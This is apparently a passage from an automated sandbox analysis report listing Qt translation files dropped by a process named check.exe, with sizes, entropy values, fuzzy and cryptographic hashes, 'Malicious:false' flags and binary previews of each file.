                                                                                                                                                                                                            SHA-512:9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):174701
                                                                                                                                                                                                            Entropy (8bit):4.87192387061682
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
                                                                                                                                                                                                            MD5:C57D0DE9D8458A5BEB2114E47B0FDE47
                                                                                                                                                                                                            SHA1:3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
                                                                                                                                                                                                            SHA-256:03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
                                                                                                                                                                                                            SHA-512:F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB..3p...*..F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9...............*...;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181387
                                                                                                                                                                                                            Entropy (8bit):4.755193800761075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XzswP2UvZ5aZ9jFTkmq/gnBNW/+PcWrqm2Vliz0DGdaS4KSLZjwTTgwUR0toT:j3m27AjCT
                                                                                                                                                                                                            MD5:859CE522A233AF31ED8D32822DA7755B
                                                                                                                                                                                                            SHA1:70B19B2A6914DA7D629F577F8987553713CD5D3F
                                                                                                                                                                                                            SHA-256:7D1E5CA3310B54D104C19BF2ABD402B38E584E87039A70E153C4A9AF74B25C22
                                                                                                                                                                                                            SHA-512:F9FAA5A19C2FD99CCD03151B7BE5DDA613E9C69678C028CDF678ADB176C23C7DE9EB846CF915BC3CC67ABD5D62D9CD483A5F47A57D5E6BB2F2053563D62E1EF5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB..4....*..h....+......@...f...A.......B.......C.......D...U...E.......F...v...G.......H.......I.......P.......Q.......R...6...S...Z...T...~...U.......V.......W..."...X...F...Y...j...]..+....s.......t..................-...;..+....;..,....;../....;..;....M..+....O.......O...r...........}..,............=...8...m..,0...t...c......T...(5..B...+;..NH..+;..~H..+O..,...1...UP..D@......E@......H4...E..HY..j...H.......IC...#..J....J..J.......J.......LD......L....1..PS...B..QR......R...o...T.......U.......X.......Zr......[`...W..\....}..]x...[.._....-.._.......yg...e..1...O....E..R....7..........-!......]............................$..k....[...7...,.......y...c...y.................j4...........9..l8...E..p............z...;..................%..a....D...~.............-.....L......OH.....Uz...5.......0.......0...U...0.......0..p....5...7...5..L$..............p... D..-... D..i...+....@..<U.....<U.....<....S..H5..-2..H5..j$..L....B..VE.. ...VE..P...V...*...f...e...f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):220467
                                                                                                                                                                                                            Entropy (8bit):4.626295310482312
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:7w8go8+ph6JVB8XVXYWpSNEeg8+vaD+p4N8DDiEKugwGZulh15ce4M+4NsPYXCZW:88h8Sj286tTiDD
                                                                                                                                                                                                            MD5:40760A3456C9C8ABE6EA90336AF5DA01
                                                                                                                                                                                                            SHA1:B249AA1CBF8C2636CE57EB4932D53492E4CE36AC
                                                                                                                                                                                                            SHA-256:553C046835DB9ADEF15954FA9A576625366BA8BFD16637038C4BCD28E5EBACE1
                                                                                                                                                                                                            SHA-512:068E55F39B5250CC937E4B2BD627873132D201D351B9351BE703CD9B95D3BAFB4BD649CB4DF120A976D7C156DA679758D952CAC5E0523107244E517D323BC0C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de_DEB..7....*.......+..3....@..R....A..R....B..S....C..S@...D..S....E..T]...F..T....G..T....H..T....I..U#...P..W....Q..W6...R..W....S..W....T..W....U..W....V..XG...W..Xk...X..X....Y..X....]..2%...s..J$...t..9R......J.......B....;..1....;..3....;..q....;.......M..2O...O.......O..X@......ia...}..2y......Q....=..Q....m..2....t..Q...........(5......+;..ev..+;......+O..oh..1....4..D@..R...E@..WZ..H4..4...HY...[..H...AY..IC..>o..J...>...J.......J...>6..LD..@A..L...@...PS..I...QR..#...R....h..T...W...U...Xh..U....~..X...]...Zr..e(..[`..)...\...j...]x..O..._....K.._...lI..yg...U..1...f....E..i....7..........o.......wG......6.......6.......8....$...n...[..8....,..9....y.......y..=................3......>....9.......E..."......?_...z..#d.......0......A%...%..z....D..A.......B......KP......2.............^...5..B....0.......0..p....0..F....0...}...5..G....5..........H........... D..3}.. D...O..+...Q...<?..Ti..<U......<U..T...<...U)..H5..3...H5......L...X...VE..%j..V...l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165170
                                                                                                                                                                                                            Entropy (8bit):4.679910767547088
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:JVwzuvb+Ta64KQd84arHX5pxiVhA8QlOD/BnFNa8NsvsfFsfcoZtIx6F:JVwSTG4KqVaLX5pEVK7OJFczstgRtIx8
                                                                                                                                                                                                            MD5:C7C58A6D683797BFDD3EF676A37E2A40
                                                                                                                                                                                                            SHA1:809E580CDBF2FFDA10C77F8BE9BAC081978C102B
                                                                                                                                                                                                            SHA-256:4FFDA56BA3BB5414AB0482D1DDE64A6F226E3488F6B7F3F11A150E01F53FA4C8
                                                                                                                                                                                                            SHA-512:C5AED1A1AA13B8E794C83739B7FDDEAFD96785655C287993469F39607C8B9B0D2D8D222ECD1C13CF8445E623B195192F64DE373A8FB6FE43743BAF50E153CDA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB../....*..*,...+...y...@.......A.......B.......C.......D...v...E...=...F.......G.......H.......I.......P.......Q... ...R...k...S.......T.......U.......V...1...W...U...X...y...Y.......]..+....s.......t...................c...;..+....;..,....;...%...;..#....;..-....M..+....O.......O...............}..,............=...]...m..,/...t..........A...(5..3...+;..<...+;..o...+O..!b..1...Ap..D@......E@...D..H4...-..HY..[F..H.......IC...%..J....L..J.......J.......LD......L....O..PS......QR..!...R...`K..T.......U....&..X.......Zr.....[`...h..\......]x...|.._....Y.._....A..yg......1...=....E..?a......!.......K........G...............R...$..\Q...[.......,...z...y.......y..................+............9..\....E..2............z.. ....................%..ON...D........................:......=B.....A....5...7...0.......0......0.."....0...,...0..3....5...}...5...Y..............a... D..-!.. D..Z6..+....0..<U...h..<U......<.......H5..-M..H5..Z...L.......VE.."...VE..>...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179941
                                                                                                                                                                                                            Entropy (8bit):4.720938209922096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:lvdTgO2Yl97ZWnbgTLt/Tf9IlqAeiy5uWkYGM0wNCdRjSK2YUlUs:lvdkA9vh5uWkY0MK2YXs
                                                                                                                                                                                                            MD5:8472CF0BF6C659177AD45AA9E3A3247C
                                                                                                                                                                                                            SHA1:7B5313CDA126BB7863001499FB66FB1B56C255FC
                                                                                                                                                                                                            SHA-256:E47FE13713E184D07FA4495DDE0C589B0E8F562E91574A3558A9363443A4FA72
                                                                                                                                                                                                            SHA-512:DE36A1F033BD7A4D6475681EDC93CC7B0B5DCB6A7051831F2EE6F397C971B843E1C10B66C4FB2EFF2A23DC07433E80FBF7B95E62C5B93E121AB5AD88354D9CB8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fiB..38...*..ct...+......@.......A.......B.......C...@...D.......E...]...F.......G.......H.......I...#...P.......Q...6...R.......S.......T.......U.......V...G...W...k...X.......Y.......]..*....s...T...t.......................;..*....;..+....;..&....;..3....M..+!...O.......O...e...........}..+K...........=.......m..+w...t..........J...(5..9...+;..:y..+;..mW..+O..$...1...KY..D@......E@...Z..H4...l..HY..X&..H.......IC......J.......J...."..J......LD.....L.......PS...'..QR.. L..R...]...T.......U.......X.......Zr......[`......\.......]x......_....k.._....>..yg.. /..1...;....E..>....7..{(......%.......J........T.......&.......U...$..Y[...[......,...s...y.......y...a.......}......d...........9..Y....E..k'...........z...........V..........%..M....D...Q.......{......d.....A......E......K....5.......0.......0..&J...0.......0..k....5...*...5..I9.............._:.. D..,O.. D..W...+....9..<U...G..<U...*..<.......H5..,y..H5..W...H5......L....5..VE..!u..VE..E...V..."{..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):166167
                                                                                                                                                                                                            Entropy (8bit):4.685212271435657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:CLZ1w8McowCppcPwL5pYFw+G00QsbLckCiWxvq+sjs06oFm:C91wxcowspc4L5pUw+cz39CiQ7tloFm
                                                                                                                                                                                                            MD5:1F41FF5D3A781908A481C07B35998729
                                                                                                                                                                                                            SHA1:ECF3B3156FFE14569ECDF805CF3BE12F29681261
                                                                                                                                                                                                            SHA-256:EDB32A933CEF376A2636634E14E2977CED6284E4AA9A4AC7E2292F9CA54C384A
                                                                                                                                                                                                            SHA-512:A492E8AC88095A38A13549C18C68E1F61C7054AB9362C2B04C65B93E48E4A07941C8DA6950BAE79041094623E0ED330CA975110FDE8248B4D9380B9F729AD891
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB../....*..-....+.......@.......A.......B.......C...?...D.......E...\...F.......G.......H.......I..."...P.......Q...5...R.......S.......T.......U.......V...F...W...j...X.......Y.......]..+....s...=...t.......................;..+....;..,....;.......;..$b...;.......M..,....O.......O...5...........}..,3...........=.......m..,]...t..........A...(5..5j..+;..<T..+;..o...+O.."+..1...B\..D@......E@...Y..H4...8..HY..[{..H.......IC......J.......J.......J.......LD...|..L.......PS...?..QR..!...R...`j..T.......U....[..X.......Zr.....[`...)..\......]x......_....7.._.......yg...i..1...=Q...E..?@......"Y......K............................$..\....[...^...,...'...y.......y...+.......o....../c.......Y...9..\....E..6(...........z..!................j...%..OC...D...+.......[......a.....;......>......B....5.......0.......0...m...0..#....0.......0..6....5.......5..................a... D..-Y.. D..Ze..+....]..<U...;..<U......<.......H5..-...H5..Z...L.......VE.."...VE..?...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):189580
                                                                                                                                                                                                            Entropy (8bit):4.630160941635514
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:SiaI3C87jhakhR0VGkw7ys7CskUH6y4e6IFB4xyMuhvDnJGhFaCo527arBbm07LZ:S2yGjh17yGqxTXhvQoejJd8FUjVgk
                                                                                                                                                                                                            MD5:EB1FB93B0BE51C2AD78FC7BA2F8B9F42
                                                                                                                                                                                                            SHA1:24F7FF809E2F11C579CD388FEA5A4C552FF8D4D0
                                                                                                                                                                                                            SHA-256:63B439DD44139AA3AED54C2EBE03FA9BC77F22C14ED8FBA8EFF2608445BB233D
                                                                                                                                                                                                            SHA-512:E13770AEF33B6666ED7D54E03EE20CA291D4167D673BA6C61D8E64CDD5F7FFE0A9521B95AF67BE719BF263932ECF16E2B2D0B5F3404F9BCD7879114FCC6FC474
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):138690
                                                                                                                                                                                                            Entropy (8bit):5.515748942553918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                            MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                            SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                            SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                            SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160494
                                                                                                                                                                                                            Entropy (8bit):4.831791320613137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                            MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                            SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                            SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                            SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161172
                                                                                                                                                                                                            Entropy (8bit):4.680034416311688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                            MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                            SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                            SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                            SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129911
                                                                                                                                                                                                            Entropy (8bit):5.802855391832282
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                            MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                            SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                            SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                            SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):156799
                                                                                                                                                                                                            Entropy (8bit):5.859529082176036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                            MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                            SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                            SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                            SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153608
                                                                                                                                                                                                            Entropy (8bit):4.843805801051326
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                            MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                            SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                            SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                            SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162982
                                                                                                                                                                                                            Entropy (8bit):4.841899887077422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                            MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                            SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                            SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
